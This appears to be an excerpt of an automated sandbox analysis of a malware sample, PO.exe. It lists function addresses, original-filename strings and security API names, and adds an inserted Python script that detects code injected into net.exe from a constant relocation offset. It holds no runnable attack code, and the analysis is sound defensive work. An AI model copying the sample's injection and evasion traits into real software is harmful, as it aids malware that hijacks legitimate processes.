                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07599E480_2_07599E48
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07591A400_2_07591A40
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759B0580_2_0759B058
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07598F580_2_07598F58
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759CF700_2_0759CF70
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759BF250_2_0759BF25
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759CF800_2_0759CF80
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07599E380_2_07599E38
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759DDC20_2_0759DDC2
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E5F00_2_0759E5F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E5E10_2_0759E5E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E3520_2_0759E352
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E3600_2_0759E360
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07591A300_2_07591A30
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E1F00_2_0759E1F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E1E00_2_0759E1E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079082880_2_07908288
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079041E80_2_079041E8
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07903B080_2_07903B08
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079028700_2_07902870
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790B7880_2_0790B788
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079046B20_2_079046B2
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079046B80_2_079046B8
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079082780_2_07908278
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790D2680_2_0790D268
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079041DA0_2_079041DA
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790001F0_2_0790001F
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079000400_2_07900040
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902FB00_2_07902FB0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902FA10_2_07902FA1
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902D580_2_07902D58
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902D490_2_07902D49
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790DC180_2_0790DC18
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790BBC00_2_0790BBC0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902B080_2_07902B08
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902AF80_2_07902AF8
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07903AF80_2_07903AF8
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079028600_2_07902860
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004185E32_2_004185E3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004010002_2_00401000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040E1432_2_0040E143
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004011602_2_00401160
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040E13B2_2_0040E13B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004023A02_2_004023A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004014602_2_00401460
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0042ED432_2_0042ED43
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040FDC32_2_0040FDC3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040FDBA2_2_0040FDBA
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040264C2_2_0040264C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004026502_2_00402650
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_00402F302_2_00402F30
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040FFE32_2_0040FFE3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004167F32_2_004167F3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040DFF32_2_0040DFF3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017881582_2_01788158
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179A1182_2_0179A118
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F01002_2_016F0100
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B81CC2_2_017B81CC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C01AA2_2_017C01AA
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017920002_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BA3522_2_017BA352
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E3F02_2_0170E3F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C03E62_2_017C03E6
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A02742_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017802C02_2_017802C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017005352_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C05912_2_017C0591
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B24462_2_017B2446
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A44202_2_017A4420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AE4F62_2_017AE4F6
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017007702_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017247502_2_01724750
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FC7C02_2_016FC7C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171C6E02_2_0171C6E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017169622_2_01716962
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A02_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017CA9A62_2_017CA9A6
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170A8402_2_0170A840
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017028402_2_01702840
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E8F02_2_0172E8F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E68B82_2_016E68B8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BAB402_2_017BAB40
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B6BD72_2_017B6BD7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA802_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179CD1F2_2_0179CD1F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170AD002_2_0170AD00
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FADE02_2_016FADE0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01718DBF2_2_01718DBF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700C002_2_01700C00
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0CF22_2_016F0CF2
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0CB52_2_017A0CB5
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01774F402_2_01774F40
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01720F302_2_01720F30
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A2F302_2_017A2F30
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01742F282_2_01742F28
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F2FC82_2_016F2FC8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177EFA02_2_0177EFA0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700E592_2_01700E59
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BEE262_2_017BEE26
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BEEDB2_2_017BEEDB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01712E902_2_01712E90
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BCE932_2_017BCE93
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017CB16B2_2_017CB16B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EF1722_2_016EF172
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0173516C2_2_0173516C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170B1B02_2_0170B1B0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B70E92_2_017B70E9
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017BF0E0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017070C0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017AF0CC
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_016ED34C
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017B132D
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0174739A
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0171D2F0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017A12ED
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0171B2C0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017052A0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017B7571
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0179D5B0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_016F1460
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017BF43F
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017BF7B0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017B16CC
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01709950
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0171B950
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01795910
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0176D800
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017038E0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017BFB76
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01775BF0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0173DBF9
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0171FB80
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01773A6C
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017BFA49
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017B7A46
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017ADAC6
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01745AA0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0179DAAC
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017A1AA3
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017B7D73
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017B1D5A
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01703D40
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_0171FDC0
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01779C32
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017BFCF2
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017BFF09
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_017BFFB1
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01701F92
Source: C:\Users\user\Desktop\PO.exe | Code function: 2_2_01709EB0
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B092F0
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B0B330
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B09340
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B11B40
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B2A090
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B13930
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B0B110
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B0B107
Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe | Code function: 6_2_02B09490
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EE02C0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F00274
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F203E6
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E6E3F0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1A352
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EF2000
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F181CC
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F141A2
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F201AA
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EE8158
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E50100
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EFA118
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E7C6E0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E5C7C0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E60770
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E84750
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F0E4F6
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F12446
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F04420
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F20591
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E60535
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E5EA80
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F16BD7
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1AB40
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E8E8F0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E468B8
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E62840
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E6A840
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E629A0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F2A9A6
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E76962
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1EEDB
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1CE93
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E72E90
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E60E59
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1EE26
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E52FC8
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EDEFA0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02ED4F40
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F02F30
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EA2F28
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E80F30
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E50CF2
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F00CB5
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E60C00
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E5ADE0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E78DBF
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E6AD00
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EFCD1F
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E7D2F0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F012ED
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E7B2C0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E652A0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EA739A
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E4D34C
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1132D
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1F0E0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F170E9
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E670C0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F0F0CC
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E6B1B0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E9516C
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E4F172
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F2B16B
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F116CC
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EA5630
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1F7B0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E51460
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1F43F
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EFD5B0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F17571
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F0DAC6
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EFDAAC
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EA5AA0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F01AA3
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02ED3A6C
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F17A46
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1FA49
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E9DBF9
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02ED5BF0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E7FB80
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1FB76
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E638E0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02ECD800
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E69950
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E7B950
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02EF5910
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E69EB0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1FFB1
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E61F92
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1FF09
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F1FCF2
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02ED9C32
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E7FDC0
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F17D73
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02E63D40
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F11D5A
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00431D80
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_0042CC07
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_0042CC10
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_0042AE40
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_0042CE30
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_0042AF88
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_0042AF90
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00435430
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00433640
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_0044BB90
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00ACE214
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00ACE335
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00ACE6CC
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00ACD798
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00ACC9F6
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_00ACCA48
Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02E4B970 appears 262 times
Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02E95130 appears 58 times
Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02ECEA12 appears 86 times
Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02EDF290 appears 103 times
Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02EA7E54 appears 107 times
Source: C:\Users\user\Desktop\PO.exe | Code function: String function: 01735130 appears 58 times
Source: C:\Users\user\Desktop\PO.exe | Code function: String function: 0176EA12 appears 86 times
Source: C:\Users\user\Desktop\PO.exe | Code function: String function: 0177F290 appears 103 times
Source: C:\Users\user\Desktop\PO.exe | Code function: String function: 01747E54 appears 99 times
Source: C:\Users\user\Desktop\PO.exe | Code function: String function: 016EB970 appears 262 times
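The "String function" rows give the same five functions in the second PO.exe instance (run 2_2) and in net.exe (run 7_2) with identical or near-identical hit counts, and every pair of addresses differs by exactly 0x01760000; the per-process "Code function" rows show the same delta (2_2_017BF0E0 against 7_2_02F1F0E0, 2_2_016ED34C against 7_2_02E4D34C, and so on). A constant delta between two processes' function sets is what one image, relocated and written into a second process, looks like from the outside, and it ties the "Injects a PE file into a foreign processes" signature to concrete evidence. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses rows in the form shown above (a subset is embedded, with the directory prefixes trimmed) and, for two processes, searches every pairwise address difference for the relocation delta that maps the most functions of one onto the other, leaving whatever does not fit (here net.exe's own 0x0043xxxx and 0x00ACxxxx code) as a residue.

```python
import re
from collections import defaultdict

# Rows copied from the report above for PO.exe (run 2_2) and net.exe (run 7_2),
# in "process | Code function: ..." form with the directory prefixes trimmed.
# Only a subset of the report's rows is reproduced; the addresses are the report's own.
REPORT_ROWS = """\
PO.exe | Code function: 2_2_017BF0E0
PO.exe | Code function: 2_2_017070C0
PO.exe | Code function: 2_2_017AF0CC
PO.exe | Code function: 2_2_016ED34C
PO.exe | Code function: 2_2_017B132D
PO.exe | Code function: 2_2_0174739A
PO.exe | Code function: String function: 01735130 appears 58 times
PO.exe | Code function: String function: 0176EA12 appears 86 times
PO.exe | Code function: String function: 0177F290 appears 103 times
PO.exe | Code function: String function: 016EB970 appears 262 times
net.exe | Code function: 7_2_02F1F0E0
net.exe | Code function: 7_2_02E670C0
net.exe | Code function: 7_2_02F0F0CC
net.exe | Code function: 7_2_02E4D34C
net.exe | Code function: 7_2_02F1132D
net.exe | Code function: 7_2_02EA739A
net.exe | Code function: 7_2_00431D80
net.exe | Code function: 7_2_00ACE214
net.exe | Code function: String function: 02E95130 appears 58 times
net.exe | Code function: String function: 02ECEA12 appears 86 times
net.exe | Code function: String function: 02EDF290 appears 103 times
net.exe | Code function: String function: 02E4B970 appears 262 times
"""

ROW_RE = re.compile(
    r"^(?P<proc>[^|]+?)\s*\|\s*Code function:\s*"
    r"(?:String function:\s*(?P<sfn>[0-9A-Fa-f]{8}) appears \d+ times"
    r"|\d+_\d+_(?P<addr>[0-9A-Fa-f]{8}))\s*$"
)


def parse_functions(text):
    """Map each process name to the set of function addresses the report lists
    for it. Ordinary and 'String function' rows are merged: both are code
    addresses inside the analysed image."""
    funcs = defaultdict(set)
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            funcs[m.group("proc").strip()].add(int(m.group("sfn") or m.group("addr"), 16))
    return dict(funcs)


def best_relocation(src, dst):
    """Return (delta, matched): the constant offset that maps the most addresses
    of src onto dst (src + delta in dst) and the src addresses it maps. Every
    pairwise difference is a candidate, so there are O(|src| * |dst|) candidates
    each scored in O(|src|); fine for the few hundred functions a report lists."""
    dst = set(dst)
    candidates = sorted({b - a for a in src for b in dst})

    def score(d):
        return sum((a + d) in dst for a in src)

    delta = max(candidates, key=score)
    matched = sorted(a for a in src if (a + delta) in dst)
    return delta, matched


def injected_code_report(text, src_proc, dst_proc):
    """Summarise how much of src_proc's code reappears, relocated, in dst_proc."""
    funcs = parse_functions(text)
    delta, matched = best_relocation(funcs[src_proc], funcs[dst_proc])
    leftover = sorted(a for a in funcs[dst_proc] if (a - delta) not in funcs[src_proc])
    return {
        "delta": delta,
        "matched": len(matched),
        "src_total": len(funcs[src_proc]),
        "dst_total": len(funcs[dst_proc]),
        "unmatched_dst": leftover,  # dst code that is not the relocated image
    }


if __name__ == "__main__":
    r = injected_code_report(REPORT_ROWS, "PO.exe", "net.exe")
    print(f"delta=0x{r['delta']:08X}: {r['matched']}/{r['src_total']} PO.exe functions "
          f"reappear in net.exe; {len(r['unmatched_dst'])} net.exe functions do not fit")
```

The report lists more functions for net.exe (7_2) than for the second PO.exe instance (2_2), so over the full rows the match is partial in that direction; the delta is the result that matters, and the functions left over in net.exe are the host binary's own code rather than the injected image.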
Source: PO.exe, 00000000.00000000.1753975528.0000000000C80000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameiJcB.exe< vs PO.exe
Source: PO.exe, 00000000.00000002.1787400778.000000000119E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PO.exe
Source: PO.exe, 00000000.00000002.1795477777.000000000BA90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs PO.exe
Source: PO.exe, 00000002.00000002.2274931580.0000000001294000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamenet.exej% vs PO.exe
Source: PO.exe, 00000002.00000002.2275360334.00000000017ED000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
Source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamenet.exej% vs PO.exe
Source: PO.exe | Binary or memory string: OriginalFilenameiJcB.exe< vs PO.exe
Source: PO.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PO.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PO.exe.ba90000.5.raw.unpack, ig4bTw1peNbeeam7US.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PO.exe.ba90000.5.raw.unpack, ig4bTw1peNbeeam7US.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
